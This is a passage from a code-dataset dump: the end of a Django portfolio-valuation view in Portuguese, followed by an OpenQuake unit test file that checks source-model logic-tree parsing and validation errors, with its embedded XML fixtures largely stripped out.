acao.papel == 'caixa':\n if 
acao.dolarizado == False:\n total_carteira += float(acao.quantidade)*float(acao.preco_medio)\n else:\n total_carteira += (float(acao.quantidade)*float(acao.preco_medio))* dolar\n else:\n if acao.dolarizado == True:\n total_carteira += float(acao.quantidade)*float(scraping_exterior(acao))* dolar\n else:\n total_carteira += float(acao.quantidade)*float(scraping(acao))\n return total_carteira\n\ndef get_dolar_price():\n endpoint = 'https://economia.awesomeapi.com.br/json/all/USD-BRL'\n resposta = requests.request('GET', endpoint)\n return float(resposta.json()['USD']['ask'])\n\ndef tratamento_dicionario(moeda, mes_carteira, papel, quantidade, cotacao_atual, preco_medio, dolarizado, lucro):\n return {\n 'mes_carteira':mes_carteira,\n 'papel':f' {papel}',\n 'quantidade':quantidade,\n 'cotacao_atual':f' {moeda}{float(cotacao_atual):.2f}',\n 'preco_medio':f' {moeda}{preco_medio:.2f}',\n 'dolarizado': dolarizado,\n 'lucro':f' {moeda}{lucro:.2f}'\n }\n\n\ndef lista_acao_vendas(request):\n queryset_vendas = Vendas.objects.all()\n context = {\n 'queryset_vendas':'dicionario_venda',\n }\n return render(request, 'list_items_vendas.html', context)\n","repo_name":"ribeirosaimon/python_for_finance","sub_path":"carteira/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4277,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"5108489571","text":"import os\nimport codecs\nimport unittest\nimport collections\n\nimport numpy\nfrom xml.parsers.expat import ExpatError\nfrom xml.etree import ElementTree as ET\nfrom copy import deepcopy\n\nfrom io import BytesIO\nfrom decimal import Decimal\nfrom mock import Mock\n\nimport openquake.hazardlib\nfrom openquake.hazardlib import geo\nfrom openquake.baselib.general import gettemp\nfrom openquake.hazardlib import valid\nfrom openquake.commonlib import logictree, readinput, tests, source\nfrom openquake.hazardlib.tom import PoissonTOM\nfrom openquake.hazardlib.pmf import PMF\nfrom openquake.hazardlib.mfd import TruncatedGRMFD, EvenlyDiscretizedMFD\n\nDATADIR = os.path.join(os.path.dirname(__file__), 'data')\n\n\nclass StringIO(BytesIO):\n def __repr__(self):\n return ''\n\n\nclass _TestableSourceModelLogicTree(logictree.SourceModelLogicTree):\n def __init__(self, filename, files, basepath, validate=True):\n self.files = files\n if not validate:\n self.validate_branchset = self.__fail\n self.validate_tree = self.__fail\n self.validate_filters = self.__fail\n self.validate_uncertainty_value = self.__fail\n f = gettemp(files[filename], suffix='.' 
+ filename)\n super().__init__(f, validate)\n\n def _get_source_model(self, filename):\n return StringIO(self.files[filename].encode('utf-8'))\n\n def __fail(self, *args, **kwargs):\n raise AssertionError(\"this method shouldn't be called\")\n\n\ndef _make_nrml(content):\n return (\"\"\"\n \\\n %s\n \"\"\" % content)\n\n\ndef _whatever_sourcemodel():\n return _make_nrml(\"\"\"\\\n \n \n \n \n \n -121.82290 37.73010 0.0\n -122.03880 37.87710 0.0\n \n \n 38\n 8.0\n 13.0\n \n WC1994\n 1.5\n \n 90.0\n \n\n \n \n \n \n -121.82290 37.73010 0.0\n -122.03880 37.87710 0.0\n \n \n 38\n 8.0\n 13.0\n \n WC1994\n 1.5\n \n 90.0\n \n\n \n \n \n -122.0 38.0\n \n 0.0\n 10.0\n \n WC1994\n 0.5\n \n \n \n \n \n \n \n \n \n \n \n \"\"\")\n\n\ndef _whatever_sourcemodel_lt(sourcemodel_filename):\n return _make_nrml(\"\"\"\\\n \n \n \n \n %s\n 1.0\n \n \n \n \n \"\"\" % sourcemodel_filename)\n\n\nclass SourceModelLogicTreeBrokenInputTestCase(unittest.TestCase):\n def _assert_logic_tree_error(self, filename, files, basepath,\n exc_class=logictree.LogicTreeError,\n exc_filename=None):\n with self.assertRaises(exc_class) as arc:\n _TestableSourceModelLogicTree(filename, files, basepath)\n exc = arc.exception\n if '.' in exc.filename:\n suffix = exc.filename.rsplit('.')[1]\n self.assertEqual(suffix, exc_filename or filename)\n return exc\n\n def test_logictree_invalid_xml(self):\n self._assert_logic_tree_error(\n 'broken_xml', {'broken_xml': \"\n \n \n \"\"\")\n exc = self._assert_logic_tree_error(\n 'screwed_schema', {'screwed_schema': source}, 'base',\n logictree.ValidationError)\n self.assertIn('missing logicTree node', exc.message)\n\n def test_wrong_uncert_type_on_first_branching_level(self):\n source = _make_nrml(\"\"\"\\\n \n \n \n \n +100\n 1.0\n \n \n \n \n \"\"\")\n exc = self._assert_logic_tree_error(\n 'logictree', {'logictree': source}, 'base',\n logictree.ValidationError\n )\n self.assertEqual(exc.lineno, 4)\n error = 'first branchset must define an uncertainty ' \\\n 'of type \"sourceModel\"'\n self.assertTrue(error in str(exc),\n \"wrong exception message: %s\" % exc)\n\n def test_source_model_uncert_on_wrong_level(self):\n lt = _make_nrml(\"\"\"\\\n \n \n \n \n sm1\n 1.0\n \n \n \n \n \n \n sm2\n 1.0\n \n \n \n \n \"\"\")\n sm = _whatever_sourcemodel()\n exc = self._assert_logic_tree_error(\n 'lt', {'lt': lt, 'sm1': sm, 'sm2': sm}, 'base',\n logictree.ValidationError\n )\n self.assertEqual(exc.lineno, 13)\n error = 'uncertainty of type \"sourceModel\" can be defined ' \\\n 'on first branchset only'\n self.assertEqual(exc.message, error,\n \"wrong exception message: %s\" % exc.message)\n\n def test_two_branchsets_on_first_level(self):\n lt = _make_nrml(\"\"\"\\\n \n \n \n \n sm1\n 1.0\n \n \n \n \n sm2\n 1.0\n \n \n \n \n \"\"\")\n sm = _whatever_sourcemodel()\n exc = self._assert_logic_tree_error(\n 'lt', {'lt': lt, 'sm1': sm, 'sm2': sm}, 'base',\n logictree.ValidationError\n )\n self.assertEqual(exc.lineno, 11)\n error = 'there must be only one branch set on first branching level'\n self.assertEqual(exc.message, error,\n \"wrong exception message: %s\" % exc.message)\n\n def test_branch_id_not_unique(self):\n lt = _make_nrml(\"\"\"\\\n \n \n \n \n sm1\n 0.7\n \n \n sm2\n 0.4\n \n \n \n \n \"\"\")\n sm = _whatever_sourcemodel()\n exc = self._assert_logic_tree_error(\n 'lt', {'lt': lt, 'sm1': sm, 'sm2': sm}, '/bz',\n logictree.ValidationError\n )\n self.assertEqual(exc.lineno, 10)\n self.assertEqual(exc.message, \"branchID 'b1' is not unique\",\n \"wrong exception message: %s\" % exc.message)\n\n def 
test_branches_weight_wrong_sum(self):\n lt = _make_nrml(\"\"\"\\\n \n \n \n \n sm1\n 0.7\n \n \n sm2\n 0.4\n \n \n \n \n \"\"\")\n sm = _whatever_sourcemodel()\n exc = self._assert_logic_tree_error(\n 'lo', {'lo': lt, 'sm1': sm, 'sm2': sm}, 'base',\n logictree.ValidationError\n )\n self.assertEqual(exc.lineno, 4)\n self.assertEqual(exc.message, \"branchset weights don't sum up to 1.0\",\n \"wrong exception message: %s\" % exc.message)\n\n def test_apply_to_nonexistent_branch(self):\n lt = _make_nrml(\"\"\"\\\n \n \n \n \n sm\n 1.0\n \n \n \n \n \n \n 123\n 1.0\n \n \n \n \n \"\"\")\n sm = _whatever_sourcemodel()\n exc = self._assert_logic_tree_error('lt', {'lt': lt, 'sm': sm}, 'base',\n logictree.ValidationError)\n self.assertEqual(exc.lineno, 13)\n self.assertEqual(exc.message, \"branch 'mssng' is not yet defined\",\n \"wrong exception message: %s\" % exc.message)\n\n def test_apply_to_occupied_branch(self):\n lt = _make_nrml(\"\"\"\\\n \n \n \n \n sm\n 1.0\n \n \n \n \n \n \n 123\n 1.0\n \n \n \n \n 123\n 1.0\n \n \n \n \n \"\"\")\n sm = _whatever_sourcemodel()\n exc = self._assert_logic_tree_error('lt', {'lt': lt, 'sm': sm}, 'base',\n logictree.ValidationError)\n self.assertEqual(exc.lineno, 21)\n error = \"branch 'b1' already has child branchset\"\n self.assertEqual(exc.message, error,\n \"wrong exception message: %s\" % exc.message)\n\n def test_ab_gr_absolute_wrong_format(self):\n lt = _make_nrml(\"\"\"\\\n \n \n \n \n sm\n 1.0\n \n \n \n \n \n \n 123.45\n 1.0\n \n \n \n \n \"\"\")\n\n sm = _whatever_sourcemodel()\n\n exc = self._assert_logic_tree_error('lt', {'lt': lt, 'sm': sm},\n 'base',\n logictree.ValidationError)\n self.assertEqual(exc.lineno, 17)\n error = \"expected a pair of floats separated by space\"\n self.assertEqual(exc.message, error,\n \"wrong exception message: %s\" % exc.message)\n\n def test_b_gr_relative_wrong_format(self):\n lt = _make_nrml(\"\"\"\\\n \n \n \n \n sm\n 1.0\n \n \n \n \n \n \n 123.45z\n 1.0\n \n \n \n \n \"\"\")\n sm = _whatever_sourcemodel()\n exc = self._assert_logic_tree_error('lt', {'lt': lt, 'sm': sm}, 'base',\n logictree.ValidationError)\n self.assertEqual(exc.lineno, 16)\n self.assertEqual(exc.message, 'expected single float value',\n \"wrong exception message: %s\" % exc.message)\n\n def test_incremental_mfd_absolute_wrong_format(self):\n lt = _make_nrml(\"\"\"\\\n \n \n \n \n sm\n 1.0\n \n \n \n \n \n \n \n \n -0.01 0.005\n \n \n 1.0\n \n \n \n \n \"\"\")\n sm = _whatever_sourcemodel()\n with self.assertRaises(ValueError) as arc:\n _TestableSourceModelLogicTree('lt', {'lt': lt, 'sm': sm}, 'base')\n self.assertIn(\n \"Could not convert occurRates->positivefloats: \"\n \"float -0.01 < 0, line 18\", str(arc.exception))\n\n def test_simple_fault_geometry_absolute_wrong_format(self):\n lt = _make_nrml(\"\"\"\\\n \n \n \n \n sm\n 1.0\n \n \n \n \n \n \n \n \n \n \n -121.8229 wrong -122.0388 37.8771\n \n \n \n 45.0\n \n \n 10.0\n \n \n 20.0\n \n \n \n 1.0\n \n \n \n \n \"\"\")\n sm = _whatever_sourcemodel()\n exc = self._assert_logic_tree_error('lt', {'lt': lt, 'sm': sm}, 'base',\n ValueError)\n self.assertIn(\"Found a non-float in -121.8229 wrong \"\n \"-122.0388 37.8771: 'wrong' is not a float\",\n str(exc))\n\n def test_complex_fault_geometry_absolute_wrong_format(self):\n lt = _make_nrml(\"\"\"\\\n \n \n \n \n sm\n 1.0\n \n \n \n \n \n \n \n \n \n \n \n 0.0 0.0 0.0 1.0 0.0 0.0\n \n \n \n \n \n \n 0.0 -0.1 0.0 1.0 wrong 0.0\n \n \n \n \n \n 1.0\n \n \n \n \n \"\"\")\n sm = _whatever_sourcemodel()\n exc = self._assert_logic_tree_error('lt', 
{'lt': lt, 'sm': sm}, 'base',\n ValueError)\n self.assertIn('Could not convert posList->posList: Found a non-float ',\n str(exc))\n\n def test_characteristic_fault_planar_geometry_wrong_format(self):\n lt = _make_nrml(\"\"\"\\\n \n \n \n \n sm\n 1.0\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n 1.0\n \n \n \n \n \"\"\")\n sm = _whatever_sourcemodel()\n exc = self._assert_logic_tree_error('lt', {'lt': lt, 'sm': sm}, 'base',\n ValueError)\n self.assertIn('Could not convert lat->latitude', str(exc))\n\n def test_characteristic_fault_simple_geometry_wrong_format(self):\n lt = _make_nrml(\"\"\"\\\n \n \n \n \n sm\n 1.0\n \n \n \n \n \n \n \n \n \n \n \n -121.8229 wrong -122.0388 37.8771\n \n \n \n 45.0\n \n \n 10.0\n \n \n 20.0\n \n \n \n \n 1.0\n \n \n \n \n \"\"\")\n sm = _whatever_sourcemodel()\n exc = self._assert_logic_tree_error('lt', {'lt': lt, 'sm': sm}, 'base',\n ValueError)\n self.assertIn('Could not convert posList->posList: Found a non-float',\n str(exc))\n\n def test_characteristic_fault_complex_geometry_wrong_format(self):\n lt = _make_nrml(\"\"\"\\\n \n \n \n \n sm\n 1.0\n \n \n \n \n \n \n \n \n \n \n \n \n 0.0 0.0 0.0 1.0 0.0 0.0\n \n \n \n \n \n \n 0.0 -0.1 0.0 1.0 wrong 0.0\n \n \n \n \n \n \n 1.0\n \n \n \n \n \"\"\")\n sm = _whatever_sourcemodel()\n exc = self._assert_logic_tree_error('lt', {'lt': lt, 'sm': sm}, 'base',\n ValueError)\n self.assertIn('Could not convert posList->posList: Found a non-float',\n str(exc))\n\n def test_characteristic_fault_invalid_geometry(self):\n lt = _make_nrml(\"\"\"\\\n \n \n \n \n sm\n 1.0\n \n \n \n \n \n \n \n \n XXX\n \n \n 1.0\n \n \n \n \n \"\"\")\n sm = _whatever_sourcemodel()\n exc = self._assert_logic_tree_error('lt', {'lt': lt, 'sm': sm}, 'base',\n logictree.ValidationError)\n self.assertEqual(\n exc.message,\n \"Surface geometry type not recognised\",\n \"wrong exception message: %s\" % exc.message)\n\n def test_source_model_invalid_xml(self):\n lt = _make_nrml(\"\"\"\\\n \n \n \n \n sm\n 1.0\n \n \n \n \n \"\"\")\n sm = \"\"\"ololo\"\"\"\n\n self._assert_logic_tree_error(\n 'sm', {'lt': lt, 'sm': sm}, 'base',\n ExpatError, exc_filename='sm')\n\n def test_source_model_schema_violation(self):\n lt = _make_nrml(\"\"\"\\\n \n \n \n \n sm\n 1.0\n \n \n \n \n \"\"\")\n sm = _make_nrml(\"\"\"\\\n \n \n \n Mount Diablo Thrust\n Swamps, lots of them\n 90.0\n 0.0010614989 8.8291627E-4 7.3437777E-4\n 6.108288E-4 5.080653E-4\n \n \n \n \n \n -121.82290 37.73010 0.0\n -122.03880 37.87710 0.0\n \n \n \n 38\n 8.0\n 13.0\n \n \n \n \"\"\")\n error = self._assert_logic_tree_error(\n 'lt', {'lt': lt, 'sm': sm}, '/x',\n logictree.ValidationError, exc_filename='lt')\n self.assertIn(\"node config\", str(error.message))\n\n def test_referencing_over_level_boundaries(self):\n lt = _make_nrml(\"\"\"\\\n \n \n \n \n sm1\n 0.5\n \n \n sm2\n 0.5\n \n \n \n \n \n \n 1 2\n 1.0\n \n \n \n \n \n \n 1 2\n 1.0\n \n \n \n \n \"\"\")\n sm = _whatever_sourcemodel()\n exc = self._assert_logic_tree_error(\n 'lt', {'lt': lt, 'sm1': sm, 'sm2': sm}, 'base',\n logictree.ValidationError\n )\n self.assertEqual(exc.lineno, 27)\n error = 'applyToBranches must reference only branches ' \\\n 'from previous branching level'\n self.assertEqual(exc.message, error,\n \"wrong exception message: %s\" % exc.message)\n\n def test_gmpe_uncertainty(self):\n lt = _make_nrml(\"\"\"\\\n \n \n \n \n sm\n 1.0\n \n \n \n \n \n \n CL_2002_AttenRel\n 1.0\n \n \n \n \n \"\"\")\n sm = _whatever_sourcemodel()\n exc = self._assert_logic_tree_error('lt', {'lt': lt, 'sm': sm}, 'base',\n 
logictree.ValidationError)\n self.assertEqual(exc.lineno, 13)\n error = 'uncertainty of type \"gmpeModel\" is not allowed ' \\\n 'in source model logic tree'\n self.assertEqual(exc.message, error,\n \"wrong exception message: %s\" % exc.message)\n\n def test_filters_on_first_branching_level(self):\n filters = ('applyToSources=\"src01\"',\n 'applyToTectonicRegionType=\"Active Shallow Crust\"',\n 'applyToSourceType=\"point\"')\n for filter_ in filters:\n lt = _make_nrml(\"\"\"\\\n \n \n \n \n sm\n 1.0\n \n \n \n \n \"\"\" % filter_)\n sm = _whatever_sourcemodel()\n exc = self._assert_logic_tree_error(\n 'lt', {'lt': lt, 'sm': sm}, 'base', logictree.ValidationError\n )\n self.assertEqual(exc.lineno, 4)\n error = 'filters are not allowed on source model uncertainty'\n self.assertEqual(exc.message, error,\n \"wrong exception message: %s\" % exc.message)\n\n def test_referencing_nonexistent_source(self):\n lt = _make_nrml(\"\"\"\\\n \n \n \n \n sm\n 1.0\n \n \n \n \n \n \n 123\n 1.0\n \n \n \n \n \"\"\")\n sm = _whatever_sourcemodel()\n exc = self._assert_logic_tree_error('lt', {'lt': lt, 'sm': sm}, 'base',\n logictree.ValidationError)\n self.assertEqual(exc.lineno, 13)\n error = \"source with id 'bzzz' is not defined in source models\"\n self.assertEqual(exc.message, error,\n \"wrong exception message: %s\" % exc.message)\n\n def test_referencing_nonexistent_tectonic_region_type(self):\n lt = _make_nrml(\"\"\"\\\n \n \n \n \n sm\n 1.0\n \n \n \n \n \n \n 123\n 1.0\n \n \n \n \n \"\"\")\n sm = _whatever_sourcemodel()\n exc = self._assert_logic_tree_error('lt', {'lt': lt, 'sm': sm}, 'base',\n logictree.ValidationError)\n self.assertEqual(exc.lineno, 13)\n error = \"source models don't define sources of \" \\\n \"tectonic region type 'Volcanic'\"\n self.assertEqual(exc.message, error,\n \"wrong exception message: %s\" % exc.message)\n\n def test_referencing_nonexistent_source_type(self):\n lt = _make_nrml(\"\"\"\\\n \n \n \n \n sm\n 1.0\n \n \n \n \n \n \n 123\n 1.0\n \n \n \n \n \"\"\")\n sm = _whatever_sourcemodel()\n exc = self._assert_logic_tree_error('lt', {'lt': lt, 'sm': sm}, 'base',\n logictree.ValidationError)\n self.assertEqual(exc.lineno, 13)\n error = \"source models don't define sources of type 'complexFault'\"\n self.assertEqual(exc.message, error,\n \"wrong exception message: %s\" % exc.message)\n\n def test_more_than_one_filters_on_one_branchset(self):\n lt = _make_nrml(\"\"\"\\\n \n \n \n \n sm\n 1.0\n \n \n \n \n \n \n 123\n 1.0\n \n \n \n \n \"\"\")\n sm = _whatever_sourcemodel()\n exc = self._assert_logic_tree_error('lt', {'lt': lt, 'sm': sm}, 'base',\n logictree.ValidationError)\n self.assertEqual(exc.lineno, 13)\n error = 'only one filter is allowed per branchset'\n self.assertEqual(exc.message, error,\n \"wrong exception message: %s\" % exc.message)\n\n def test_wrong_filter_on_absolute_uncertainties(self):\n uncertainties_and_values = [('abGRAbsolute', '123 45'),\n ('maxMagGRAbsolute', '678')]\n filters = ('applyToSources=\"src01 src02\"',\n 'applyToTectonicRegionType=\"Active Shallow Crust\"',\n 'applyToSourceType=\"simpleFault\"')\n for uncertainty, value in uncertainties_and_values:\n for filter_ in filters:\n lt = _make_nrml(\"\"\"\\\n \n \n \n \n sm\n 1.0\n \n \n \n \n \n \n %s\n 1.0\n \n \n \n \n \"\"\" % (uncertainty, filter_, value))\n sm = _whatever_sourcemodel()\n exc = self._assert_logic_tree_error('lt', {'lt': lt, 'sm': sm},\n 'base',\n logictree.ValidationError)\n self.assertEqual(exc.lineno, 13)\n error = (\n \"uncertainty of type '%s' must define 
'applyToSources'\"\n \" with only one source id\" % uncertainty)\n self.assertEqual(\n exc.message, error,\n \"wrong exception message: %s\" % exc.message)\n\n\nclass SourceModelLogicTreeTestCase(unittest.TestCase):\n def assert_branch_equal(self, branch, branch_id, weight_str, value,\n child_branchset_args=None):\n self.assertEqual(type(branch), logictree.Branch)\n self.assertEqual(branch.branch_id, branch_id)\n self.assertEqual(branch.weight, Decimal(weight_str))\n self.assertEqual(branch.value, value)\n if child_branchset_args is None:\n self.assertEqual(branch.child_branchset, None)\n else:\n self.assert_branchset_equal(branch.child_branchset,\n *child_branchset_args)\n\n def assert_branchset_equal(self, branchset, uncertainty_type, filters,\n branches_args):\n self.assertEqual(type(branchset), logictree.BranchSet)\n self.assertEqual(branchset.uncertainty_type, uncertainty_type)\n self.assertEqual(branchset.filters, filters)\n self.assertEqual(len(branchset.branches), len(branches_args))\n for branch, args in zip(branchset.branches, branches_args):\n self.assert_branch_equal(branch, *args)\n\n def test_only_source_models(self):\n source_model_logic_tree = _make_nrml(\"\"\"\\\n \n \n \n \n sm1\n 0.6\n \n \n sm2\n 0.4\n \n \n \n \n \"\"\")\n sm = _whatever_sourcemodel()\n lt = _TestableSourceModelLogicTree(\n 'lt', {'lt': source_model_logic_tree, 'sm1': sm, 'sm2': sm},\n 'basepath', validate=False)\n self.assertEqual(lt.samples_by_lt_path(),\n collections.Counter({('b1',): 1, ('b2',): 1}))\n\n self.assert_branchset_equal(lt.root_branchset, 'sourceModel', {},\n [('b1', '0.6', 'sm1'),\n ('b2', '0.4', 'sm2')])\n\n def test_two_levels(self):\n source_model_logic_tree = _make_nrml(\"\"\"\\\n \n \n \n \n sm\n 1.0\n \n \n \n \n \n \n 123\n 0.6\n \n \n -123\n 0.4\n \n \n \n \n \"\"\")\n sm = _whatever_sourcemodel()\n lt = _TestableSourceModelLogicTree(\n 'lt', {'lt': source_model_logic_tree, 'sm': sm}, '/base',\n validate=False)\n self.assertEqual(\n lt.samples_by_lt_path(),\n collections.Counter({('b1', 'b2'): 1, ('b1', 'b3'): 1}))\n self.assert_branchset_equal(lt.root_branchset,\n 'sourceModel', {},\n [('b1', '1.0', 'sm',\n ('maxMagGRRelative', {},\n [('b2', '0.6', +123),\n ('b3', '0.4', -123)])\n )])\n\n def test_filters(self):\n source_model_logic_tree = _make_nrml(\"\"\"\\\n \n \n \n \n sm\n 1.0\n \n \n \n \n \n \n 100 500\n 0.9\n \n \n -1.23 +0.1\n 0.1\n \n \n \n \n \"\"\")\n sm = _whatever_sourcemodel()\n lt = _TestableSourceModelLogicTree(\n 'lt', {'lt': source_model_logic_tree, 'sm': sm}, '/base',\n validate=False)\n self.assert_branchset_equal(\n lt.root_branchset,\n 'sourceModel', {},\n [('b1', '1.0', 'sm',\n ('abGRAbsolute', {'applyToSources': ['src01']},\n [('b2', '0.9', (100, 500)),\n ('b3', '0.1', (-1.23, +0.1))])\n )])\n\n def test_apply_to_branches(self):\n source_model_logic_tree = _make_nrml(\"\"\"\\\n \n \n \n \n sm1\n 0.6\n \n \n sm2\n 0.3\n \n \n sm3\n 0.1\n \n \n \n \n \n \n +1\n 1.0\n \n \n \n \n -3\n 1.0\n \n \n \n \n \"\"\")\n sm = _whatever_sourcemodel()\n lt = _TestableSourceModelLogicTree(\n 'lt', {'lt': source_model_logic_tree,\n 'sm1': sm, 'sm2': sm, 'sm3': sm},\n '/base', validate=False)\n self.assert_branchset_equal(\n lt.root_branchset,\n 'sourceModel', {},\n [('sb1', '0.6', 'sm1',\n ('bGRRelative', {},\n [('b2', '1.0', +1)]\n )),\n ('sb2', '0.3', 'sm2',\n ('maxMagGRAbsolute', {'applyToSources': ['src01']},\n [('b3', '1.0', -3)]\n )),\n ('sb3', '0.1', 'sm3',\n ('bGRRelative', {},\n [('b2', '1.0', +1)]\n ))\n ]\n )\n sb1, sb2, sb3 = lt.root_branchset.branches\n 
self.assertTrue(sb1.child_branchset is sb3.child_branchset)\n\n def test_comments(self):\n source_model_logic_tree = _make_nrml(\"\"\"\\\n \n \n \n \n \n \n \n \n \n sm\n \n 1.0\n \n \n \n \n \n \n \n \n \n \"\"\")\n sm = _whatever_sourcemodel()\n lt = _TestableSourceModelLogicTree(\n 'lt', {'lt': source_model_logic_tree, 'sm': sm},\n '/base', validate=False)\n self.assert_branchset_equal(\n lt.root_branchset, 'sourceModel', {}, [('b1', '1.0', 'sm')])\n\n\nclass SampleTestCase(unittest.TestCase):\n\n def test_sample(self):\n branches = [logictree.Branch(1, Decimal('0.2'), 'A'),\n logictree.Branch(1, Decimal('0.3'), 'B'),\n logictree.Branch(1, Decimal('0.5'), 'C')]\n samples = logictree.sample(branches, 1000, 42)\n\n def count(samples, value):\n counter = 0\n for s in samples:\n if s.value == value:\n counter += 1\n return counter\n\n self.assertEqual(count(samples, value='A'), 225)\n self.assertEqual(count(samples, value='B'), 278)\n self.assertEqual(count(samples, value='C'), 497)\n\n def test_sample_broken_branch_weights(self):\n branches = [logictree.Branch(0, Decimal('0.1'), 0),\n logictree.Branch(1, Decimal('0.2'), 1)]\n with self.assertRaises(ValueError):\n logictree.sample(branches, 1000, 42)\n\n def test_sample_one_branch(self):\n # always the same branch is returned\n branches = [logictree.Branch(0, Decimal('1.0'), 0)]\n bs = logictree.sample(branches, 10, 42)\n for b in bs:\n self.assertEqual(b.branch_id, 0)\n\n\nclass BranchSetEnumerateTestCase(unittest.TestCase):\n def test_enumerate(self):\n b0 = logictree.Branch('0', Decimal('0.64'), '0')\n b1 = logictree.Branch('1', Decimal('0.36'), '1')\n b00 = logictree.Branch('0.0', Decimal('0.33'), '0.0')\n b01 = logictree.Branch('0.1', Decimal('0.27'), '0.1')\n b02 = logictree.Branch('0.2', Decimal('0.4'), '0.2')\n b10 = logictree.Branch('1.0', Decimal('1.0'), '1.0')\n b100 = logictree.Branch('1.0.0', Decimal('0.1'), '1.0.0')\n b101 = logictree.Branch('1.0.1', Decimal('0.9'), '1.0.1')\n bs_root = logictree.BranchSet(None, None)\n bs_root.branches = [b0, b1]\n bs0 = logictree.BranchSet(None, None)\n bs0.branches = [b00, b01, b02]\n bs1 = logictree.BranchSet(None, None)\n bs1.branches = [b10]\n b0.child_branchset = bs0\n b1.child_branchset = bs1\n bs10 = logictree.BranchSet(None, None)\n bs10.branches = [b100, b101]\n b10.child_branchset = bs10\n\n ae = self.assertEqual\n\n paths = bs_root.enumerate_paths()\n ae(next(paths), (Decimal('0.2112'), [b0, b00]))\n ae(next(paths), (Decimal('0.1728'), [b0, b01]))\n ae(next(paths), (Decimal('0.256'), [b0, b02]))\n ae(next(paths), (Decimal('0.036'), [b1, b10, b100]))\n ae(next(paths), (Decimal('0.32400'), [b1, b10, b101]))\n self.assertRaises(StopIteration, lambda: next(paths))\n\n paths = bs1.enumerate_paths()\n ae(next(paths), (Decimal('0.1'), [b10, b100]))\n ae(next(paths), (Decimal('0.9'), [b10, b101]))\n self.assertRaises(StopIteration, lambda: next(paths))\n\n\nclass BranchSetGetBranchByIdTestCase(unittest.TestCase):\n def test(self):\n bs = logictree.BranchSet(None, None)\n b1 = logictree.Branch('1', Decimal('0.33'), None)\n b2 = logictree.Branch('2', Decimal('0.33'), None)\n bbzz = logictree.Branch('bzz', Decimal('0.34'), None)\n bs.branches = [b1, b2, bbzz]\n self.assertIs(bs.get_branch_by_id('1'), b1)\n self.assertIs(bs.get_branch_by_id('2'), b2)\n self.assertIs(bs.get_branch_by_id('bzz'), bbzz)\n\n def test_nonexistent_branch(self):\n bs = logictree.BranchSet(None, None)\n br = logictree.Branch('br', Decimal('1.0'), None)\n bs.branches.append(br)\n self.assertRaises(AssertionError, 
bs.get_branch_by_id, 'bz')\n\n\nclass BranchSetApplyUncertaintyMethodSignaturesTestCase(unittest.TestCase):\n def test_apply_uncertainty_ab_absolute(self):\n mfd = Mock()\n bs = logictree.BranchSet('abGRAbsolute', {})\n bs._apply_uncertainty_to_mfd(mfd, (0.1, 33.4))\n self.assertEqual(mfd.method_calls,\n [('modify', ('set_ab',\n {'a_val': 0.1, 'b_val': 33.4}), {})])\n\n def test_apply_uncertainty_b_relative(self):\n mfd = Mock()\n bs = logictree.BranchSet('bGRRelative', {})\n bs._apply_uncertainty_to_mfd(mfd, -1.6)\n self.assertEqual(mfd.method_calls,\n [('modify', ('increment_b', {'value': -1.6}), {})])\n\n def test_apply_uncertainty_mmax_relative(self):\n mfd = Mock()\n bs = logictree.BranchSet('maxMagGRRelative', {})\n bs._apply_uncertainty_to_mfd(mfd, 32.1)\n self.assertEqual(\n mfd.method_calls,\n [('modify', ('increment_max_mag', {'value': 32.1}), {})])\n\n def test_apply_uncertainty_mmax_absolute(self):\n mfd = Mock()\n bs = logictree.BranchSet('maxMagGRAbsolute', {})\n bs._apply_uncertainty_to_mfd(mfd, 55)\n self.assertEqual(mfd.method_calls,\n [('modify', ('set_max_mag', {'value': 55}), {})])\n\n def test_apply_uncertainty_incremental_mfd_absolute(self):\n mfd = Mock()\n bs = logictree.BranchSet('incrementalMFDAbsolute', {})\n bs._apply_uncertainty_to_mfd(mfd, (8.0, 0.1, [0.01, 0.005]))\n self.assertEqual(\n mfd.method_calls,\n [('modify', ('set_mfd', {'min_mag': 8.0,\n 'bin_width': 0.1,\n 'occurrence_rates': [0.01, 0.005]}), {})]\n )\n\n def test_apply_uncertainty_simple_fault_dip_relative(self):\n source = Mock()\n bs = logictree.BranchSet('simpleFaultDipRelative', {})\n bs._apply_uncertainty_to_geometry(source, 15.0)\n self.assertEqual(\n source.method_calls,\n [('modify', ('adjust_dip', {'increment': 15.0}), {})])\n\n def test_apply_uncertainty_simple_fault_dip_absolute(self):\n source = Mock()\n bs = logictree.BranchSet('simpleFaultDipAbsolute', {})\n bs._apply_uncertainty_to_geometry(source, 45.0)\n self.assertEqual(\n source.method_calls,\n [('modify', ('set_dip', {'dip': 45.0}), {})])\n\n def test_apply_uncertainty_simple_fault_geometry_absolute(self):\n source = Mock()\n trace = geo.Line([geo.Point(0., 0.), geo.Point(1., 1.)])\n bs = logictree.BranchSet('simpleFaultGeometryAbsolute', {})\n bs._apply_uncertainty_to_geometry(source,\n (trace, 0.0, 10.0, 90.0, 1.0))\n self.assertEqual(\n source.method_calls,\n [('modify', ('set_geometry', {'fault_trace': trace,\n 'upper_seismogenic_depth': 0.0,\n 'lower_seismogenic_depth': 10.0,\n 'dip': 90.0,\n 'spacing': 1.0}), {})])\n\n def test_apply_uncertainty_complex_fault_geometry_absolute(self):\n source = Mock()\n edges = [\n geo.Line([geo.Point(0.0, 0.0, 0.0), geo.Point(1.0, 0.0, 0.0)]),\n geo.Line([geo.Point(0.0, -0.1, 10.0), geo.Point(1.0, -0.1, 10.0)])\n ]\n bs = logictree.BranchSet('complexFaultGeometryAbsolute', {})\n bs._apply_uncertainty_to_geometry(source, (edges, 5.0))\n self.assertEqual(\n source.method_calls,\n [('modify', ('set_geometry', {'edges': edges,\n 'spacing': 5.0}), {})])\n\n def test_apply_uncertainty_characteristic_fault_geometry_absolute(self):\n source = Mock()\n trace = geo.Line([geo.Point(0., 0.), geo.Point(1., 1.)])\n surface = geo.SimpleFaultSurface.from_fault_data(\n trace, 0.0, 10.0, 90.0, 1.0)\n bs = logictree.BranchSet('characteristicFaultGeometryAbsolute', {})\n bs._apply_uncertainty_to_geometry(source, surface)\n self.assertEqual(\n source.method_calls,\n [('modify', ('set_geometry', {'surface': surface}), {})])\n\n def test_apply_uncertainty_unknown_uncertainty_type(self):\n bs = 
